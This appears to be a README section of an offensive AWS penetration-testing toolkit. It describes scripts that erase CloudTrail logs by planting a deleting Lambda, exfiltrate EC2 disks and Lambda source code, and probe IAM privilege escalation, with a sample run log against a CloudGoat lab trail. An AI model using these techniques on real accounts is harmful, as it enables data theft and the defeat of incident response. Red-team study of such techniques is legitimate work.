- **`assume-role-helper.sh`** - Calls `aws sts assume-role` using MFA token in order to retrieve session credentials and reformat it into `~/.aws/credentials` file format. That eases copy-and-paste of credentials provided by Assume Role facility into credentials file format. Having creds reformatted, tools such as _s3tk_ that are unable to process MFA tokens could be used using preconfigured profile creds.
- **`disruptCloudTrailByS3Lambda.py`** - This script attempts to disrupt CloudTrail by planting a Lambda function that will delete every object created in S3 bucket bound to a trail. As soon as CloudTrail creates a new object in S3 bucket, Lambda will kick in and delete that object. No object, no logs. No logs, no Incident Response :-)
- IAM role will be created, by default with name: `cloudtrail_helper_role`
- IAM policy will be created, by default with name: `cloudtrail_helper_policy`
- Lambda function will be created, by default with name: `cloudtrail_helper_function`
- Put Event notification will be configured on affected CloudTrail S3 buckets.
This tool will fail upon first execution with the following exception:
```
[-] Could not create a Lambda function: An error occurred (InvalidParameterValueException) when calling the CreateFunction operation: The role defined for the function cannot be assumed by Lambda.
```
At the moment I did not find an explanation for that, but running the tool again with the same set of parameters - get the job done.
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
[.] Will be working on Account ID: 712800000000
[.] Step 1: Determine trail to disrupt
[+] Trail cloudgoat_trail is actively logging (multi region? No).
[.] Trails intended to be disrupted:
- cloudgoat_trail
[.] Step 2: Create a role to be assumed by planted Lambda
[-] Role with name: cloudtrail_helper_role already exists.
[.] Step 3: Create a policy for that role
[-] Policy with name: cloudtrail_helper_policy already exists.
[.] Step 4: Attach policy to the role
[.] Attaching policy (arn:aws:iam::712800000000:policy/cloudtrail_helper_policy) to the role cloudtrail_helper_role
[-] Policy is already attached.
[.] Step 5: Create Lambda function
[.] Using non-disruptive lambda.
[.] Creating a lambda function named: cloudtrail_helper_function on Role: arn:aws:iam::712800000000:role/cloudtrail_helper_role
[+] Function created.
[.] Step 6: Permit function to be invoked on all trails
[.] Adding invoke permission to func: cloudtrail_helper_function on S3 bucket: arn:aws:s3:::90112981864022885796153088027941100000000000000000000000
[.] Step 7: Configure trail bucket's put notification
[.] Putting a bucket notification configuration to 90112981864022885796153088027941100000000000000000000000, ARN: arn:aws:lambda:us-west-2:712800000000:function:cloudtrail_helper_function
Afterwards, one should see following logs in CloudWatch traces for planted Lambda function - if no `--disrupt` option was specified:
```
[*] Following S3 object could be removed: (Bucket=90112981864022885796153088027941100000000000000000000000, Key=cloudtrail/AWSLogs/712800000000/CloudTrail/us-west-2/2019/03/20/712800000000_CloudTrail_us-west-2_20190320T1000Z_oxxxxxxxxxxxxc.json.gz)
- **`evaluate-iam-role.sh`** - Enumerates attached IAM Role policies or specified Policy by it's Arn, goes through all of granted permissions and lists those that are known for Privilege Escalation or other risks. If `all` was specified as a role-name, the tool will evaluate all of the user-specified IAM Roles, iteratively. Based on [Rhino Security Labs work](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/). [gist](https://gist.github.com/mgeeky/14685d94af7848e64afefe6fd2341a18)
- **`exfiltrate-ec2.py`** - This script exploits insecure permissions given to the EC2 IAM Role allowing to exfiltrate target EC2's filesystem data in a form of it's shared EBS snapshot or publicly exposed AMI image.
- **`exfiltrateLambdaTasksDirectory.py`** - Script that creates an in-memory ZIP file from the entire directory `$LAMBDA_TASK_ROOT` (typically `/var/task`) and sends it out in a form of HTTP(S) POST request, within an `exfil` parameter. To be used for exfiltrating AWS Lambda's entire source code.
- **`find-exposed-resources.sh`** - Utterly simple script enumerating some of the resources that could be publicly shared which would count as a security misconfiguration.
- **`identifyS3Bucket.rb`** - This script attempts to identify passed name whether it resolves to a valid AWS S3 Bucket via different means. This script may come handy when revealing S3 buckets hidden behind HTTP proxies.
- **`pentest-ec2-instance`** - A set of utilities for quick starting, ssh-ing and stopping of a single temporary EC2 instance intended to be used for Web out-of-band tests (SSRF, reverse-shells, dns/http/other daemons).